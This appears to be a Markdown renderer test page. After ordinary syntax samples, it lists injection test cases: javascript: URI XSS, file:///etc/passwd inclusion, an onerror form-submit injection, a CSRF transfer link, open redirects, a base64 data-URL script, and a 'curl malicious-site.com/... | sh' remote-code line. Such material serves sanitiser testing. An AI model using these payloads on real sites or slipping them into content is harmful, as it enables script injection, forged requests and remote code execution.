Markdown Test

Headers

# Markdown Test ## Headers ### Header 3 #### Header 4 ##### Header 5 ###### Header 6

Emphasis

Emphasis

*Italic* text using asterisks or _underscores_.
**Bold** text using double asterisks or __underscores__.
***Bold and italic*** text using triple asterisks or ___underscores___.

Lists

Unordered List

- Item 1
- Item 2
- Subitem 2.1
- Subitem 2.2
- Item 3

Ordered List

1. First item
2. Second item
1. Subitem 2.1
2. Subitem 2.2
3. Third item

Links

Links

[GitHub](https://www.github.com) is a code hosting platform for version control and collaboration.

Images

Images

![Markdown Logo](https://markdown-here.com/img/icon256.png)

Blockquotes

Blockquotes

> This is a blockquote.
> It can span multiple lines.

Code

Code

Inline `code` can be inserted with backticks.
```python
def hello_world():
    print("Hello, World!")
```

Extended Markdown Test

Table of Contents

# Extended Markdown Test ## Table of Contents - [Headers](#headers) - [Emphasis](#emphasis) - [Lists](#lists) - [Links](#links) - [Images](#images) - [Blockquotes](#blockquotes) - [Code](#code) - [Horizontal Rule](#horizontal-rule) - [Tables](#tables) - [Task Lists](#task-lists) - [Definition Lists](#definition-lists) - [Code Blocks](#code-blocks) - [Strikethrough](#strikethrough) - [Fenced Code Blocks with Language Specification](#fenced-code-blocks-with-language-specification) - [Footnotes](#footnotes) - [Superscript and Subscript](#superscript-and-subscript) - [Emoji](#emoji) - [LaTeX Math](#latex-math)

Abbreviations

Abbreviations

*[HTML]: HyperText Markup Language
*[CSS]: Cascading Style Sheets

HTML is an abbreviation for *[HyperText Markup Language]*, and CSS stands for *[Cascading Style Sheets]*.

Escaping Characters

Escaping Characters

To display a literal asterisk \* or underscore \_ in Markdown, use a backslash \ before the character.

Superscript in Links

Superscript in Links

This is a link with superscript1.

Strikethrough in Tables

Strikethrough in Tables

| Product | Price | Quantity | | ------------- | --------- | -------- | | Item 1 | $10 | 5 | | Item 2 | $15 | ~~10~~ | | Item 3 | $20 | 8 |

Script Execution

Script Execution

![Image](javascript:alert('Malicious Script'))

Cross-Site Scripting (XSS)

Cross-Site Scripting (XSS)

[Click me](javascript:alert('XSS Attack'))

External Resource Inclusion

External Resource Inclusion

![External Image](http://malicious-site.com/image.jpg)

File Inclusion

File Inclusion

![Include File](file:///etc/passwd)

Malformed Links with JavaScript

Malformed Links with JavaScript

[Click me](javascript:alert('Malicious Script'))

CSRF Token Manipulation

CSRF Token Manipulation

![Image](http://malicious-site.com/image.jpg" onerror="document.forms[0].submit())

Remote Code Execution (RCE) through Shell Commands

Remote Code Execution (RCE) through Shell Commands

```bash ; curl malicious-site.com/malicious-script.sh | sh ```

Cross-Origin Resource Sharing (CORS) Bypass

Cross-Origin Resource Sharing (CORS) Bypass

[Click me](https://trusted-site.com/api/data)

JavaScript Execution in Inline Code

JavaScript Execution in Inline Code

This is `javascript:alert('XSS Attack')` inline code.

Local File Inclusion

Local File Inclusion

[Include File](file:///etc/passwd)

Using Special Characters for Code Injection

Using Special Characters for Code Injection

```python import os os.system("malicious command") ```

Remote Resource Inclusion

Remote Resource Inclusion

![External Image](http://evil.com/malicious-image.jpg)

Data URL Payloads

Data URL Payloads

![Image](data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8sIFdvcmxkISIpPC9zY3JpcHQ+Cg==)

Using javascript: in HREF

Using javascript: in HREF

[Click me](javascript:alert('Click Event'))

URL Redirection

URL Redirection

[Click me](http://trusted-site.com/page?redirect=http://malicious-site.com)

CSRF Attack

CSRF Attack

[Click me](https://target-site.com/transfer?amount=10000&to=attacker-account)

Using JavaScript URIs

Using JavaScript URIs

[Click me](javascript:window.location='http://malicious-site.com')

Inline Math Blocks

Executing Code in Inline Math Blocks

$ \scriptsize{\text{alert('XSS Attack')}} $